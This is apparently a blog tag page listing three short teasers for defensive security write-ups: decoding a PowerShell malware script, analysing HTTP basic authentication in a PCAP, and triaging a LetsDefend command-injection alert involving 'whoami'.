Posts for: #Http

GothamLegend Incident Response – PowerShell Malware Analysis

Scenario Recently the networks of a large company named GothamLegend were compromised after an employee opened a phishing email containing malware. The damage caused was critical and resulted in business-wide disruption. GothamLegend had to reach out to a third-party incident response team to assist with the investigation. You are a member of the IR team - all you have is an encoded Powershell script. Can you decode it and identify what malware is responsible for this attack?
[Read more]

LetsDefend HTTP Basic Authentication Analysis – PCAP Investigation

Description In this challenge, we receive a log indicating a possible web-based attack. The objective is to analyze a provided PCAP file and extract meaningful information related to HTTP activity and authentication. Investigation Process Recovering the PCAP File The PCAP was initially obtained in a Vm from there i obtained the files. The following commands were used to take the files out of the vm as here was not much network traffic so no large size of the file:
[Read more]

LetsDefend SOC168 – Command Injection (whoami) Web Attack Analysis

Alert Name: SOC168 – Whoami Command Detected in Request Body Severity: High Event ID: 118 Event Time: Feb 28, 2022, 04:12 AM Category: Web Attack Play Book 1. Alert Overview A high-severity web attack alert was triggered on WebServer1004 due to the detection of the whoami command within the HTTP request body. This behavior is commonly associated with command injection attempts, where an attacker tries to execute system-level commands through a web application.
[Read more]